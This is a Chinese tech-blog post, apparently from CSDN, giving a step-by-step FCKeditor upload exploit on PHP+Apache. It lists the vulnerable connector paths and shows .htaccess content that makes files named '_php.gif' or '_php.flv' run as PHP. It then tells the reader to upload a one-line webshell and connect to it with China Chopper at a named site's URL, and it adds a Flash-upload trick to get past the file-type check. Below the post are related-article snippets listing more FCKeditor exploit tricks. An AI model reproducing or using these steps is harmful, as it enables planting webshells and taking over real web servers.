php+apache fckeditor漏洞利用

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量7.1k 收藏 1
点赞数
分类专栏: 技术文章 文章标签: fckeditor apache php .htaccess flash shell

1.发现fckeditor目录存在,存在以下链接:

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html?Type=image&Connector=connectors/php/connector.php

2.创建1.htaccess文件,文件内容如下:

<FilesMatch "_php.gif">

SetHandler application/x-httpd-php

</FilesMatch>

3.上传1.htaccess和一句话木马文件fuckxx.php.gif 到同一目录,一般是UserFiles/File/目录下。

4.中国菜刀链接:http://www.kanwangluo.com/UserFiles/File/fuckxx.php.gif, 

 

还有就是有些人可能会遇到在上传图片的时候,fckeditor报错,说是错误的文件什么的,这里有个方法:

可以换种上传类型,用Flash上传就不会碰到类似的限制,不过.htaccess文件的内容也要改改,还有shell的文件名

<FilesMatch "_php.flv">

SetHandler application/x-httpd-php

</FilesMatch>

shell的名字改成shell.php.flv 这样就可以了

黑面
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fckeditor 漏洞php,fckeditor上传漏洞利用总结
weixin_39616880的博客
03-11 751
FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html 查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Co...
fckeditor php漏洞,Fckeditor漏洞总结及利用方法(未成功)
weixin_34837898的博客
03-22 1482
先在这里做一个Fckeditor知识的了解:FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找第一:查看编辑器版本其相关默认路径如:FCKeditor/_whatsnew.htmlFCKeditor/editor/dialog/fck_about.htmlFCKeditor/_samp...
2024年物联网嵌入式最全fckeditor编辑器上传漏洞getshell——突破(2),2024年最新贼厉害
2401_85014346的博客
05-14 486
第二次 上传logo.asp;x.jpg ==>变成logo.asp;
fckeditor 漏洞php,Fckeditor漏洞利用总结
weixin_28366353的博客
03-11 558
查看编辑器版本FCKeditor/_whatsnew.html———————————————————————————————————————————2.Version2.2版本Apache+linux环境下在上传文件后面加个.突破!测试通过。———————————————————————————————————————————3.Version<=2.4.2Forphp在处理...
fckeditor php上传利用漏洞,Fckeditor 2.4.2 php任意上传文件漏洞
weixin_36416418的博客
03-17 395
fckeditor/editor/filemanager/upload/php/upload.php/** FCKeditor - The text editor for Internet - http://www.fckeditor.net* Copyright (C) 2003-2007 Frederico Caldeira Knabben** == BEGIN LICENSE ==** Li...
Fckeditor漏洞的利用技巧汇总
ECSHOP专属建设
04-09 442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <div id="content" class= "content mod-cs-content text-content clearfix"> 1.查看编辑器版
fckeditor 上传图片 php_Fckeditor 2.4.2 php任意上传文件漏洞修复
weixin_42468240的博客
03-09 344
1、漏洞描述fckeditor/editor/filemanager/upload/php/ 目录下config.php 文件global $Config ;// SECURITY: You must explicitelly enable this "uploader".$Config['Enabled'] = false ;// Set if the file type must be con...
FCKeditor漏洞利用集锦
weixin_30791095的博客
03-06 194
FCKeditor是何物?可能很少有人知道,但相信大部分的人都用到过。FCKeditor是一款在线编辑器,能够在线进行文字和图片的编辑等工 作,通常会作为一个编辑部件嵌入其他的一些程序中。我们平时泡论坛,写博客,经常可以在网页中对我们的文字或图片进行简单的编辑,没错,你使用的很可能就 是FCKeditor。但正是使用面如此广的一款软件,却存在相当严重的漏洞,黑客可以轻易地上传asp木马,从而得到系...
Fckeditor漏洞利用全面解析
weixin_34237596的博客
11-24 113
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For...
Fckeditor漏洞利用方法总结
oceanark的博客
07-13 5850
1.查看编辑器版本 FCKeditor/_whatsnew.html —————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 —————————————————————————————————————— 3.Version action=”ht
FCKeditor漏洞总结
01-24
- **环境配置**:该漏洞主要出现在Apache + Linux环境下。 - **描述**:由于配置不当,导致文件解析错误。例如,在某些情况下,服务器可能会将`.rar`文件当作HTML文件来解析,这为攻击者提供了上传恶意脚本的可能性...
FCKeditor漏洞
05-28
### FCKeditor漏洞详解 #### 引言 FCKeditor是一款广泛使用的富文本编辑器,因其功能强大且易于集成,深受开发者的喜爱。然而,正如许多开源软件一样,FCKeditor也存在一定的安全风险,尤其是关于文件上传和路径...
fckeditor漏洞实验环境搭建
12-13
### fckeditor漏洞实验环境搭建详解 #### 一、FCKeditor简介 FCKeditor是一款流行的富文本编辑器,被广泛应用于各种网站系统中,用于提供用户友好的编辑体验。然而,由于其复杂的功能和配置选项,FCKeditor也存在...
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor
10-28
另外,在Apache服务器上,由于"Apache文件名解析缺陷漏洞",攻击者也可能利用此编辑器的漏洞执行恶意脚本。 FCKeditor还存在一个利用2003系统路径解析漏洞的情况,攻击者可以通过创建特殊命名的目录(如"bin.asp")...
15-编辑器漏洞1
08-03
6. **FCKeditor漏洞** FCKeditor在某些版本存在过滤不严的问题,比如允许上传asa、cer、php2等不安全的文件类型。在Windows环境下,利用"Apache文件名解析缺陷漏洞",攻击者可以通过在文件名后添加`.`来绕过限制。...
Apache2 Ubuntu-XXE漏洞渗透
weixin_53736204的博客
07-25 508
只知道他在192.168.30.1-192.168.255之间,然后御剑2014端口扫描去扫描IP,发现IP为192.168.30.128是有响应。因为我们用的net模式,我们可以在本机通过ip来访问他的网站,但我们不知道他分配是哪个ip。打开robots.txt看看有什么东西,看见有/xxe目录,还有给admin.php。解码后,发现用户名密码,用户名:administhebest,密码是加密过的。我们构造xxe语句将&xxe;我们试一下xxe发现发现一个新网页,是/xxe/index.php
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 717
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 247
【代码】53、PHP 实现归并排序。
FCKeditor PHP文件上传漏洞分析与利用
1. **利用漏洞**:由于FCKeditorPHP上传模块在验证文件类型时存在缺陷,攻击者可以上传看似无害但实际上包含恶意PHP代码的文件。 2. **绕过检查**:攻击者可能通过修改文件扩展名或者利用某些服务器配置不严来绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值